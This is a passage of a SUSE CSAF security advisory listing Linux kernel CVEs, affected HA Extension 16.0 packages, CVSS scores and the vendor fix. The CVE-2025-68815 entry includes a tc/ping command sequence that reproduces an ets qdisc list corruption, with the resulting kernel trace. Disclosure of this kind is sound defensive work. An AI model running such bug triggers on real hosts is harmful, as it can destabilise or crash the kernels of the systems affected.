"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end()).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68821",
"url": "https://www.suse.com/security/cve/CVE-2025-68821"
},
{
"category": "external",
"summary": "SUSE Bug 1256667 for CVE-2025-68821",
"url": "https://bugzilla.suse.com/1256667"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
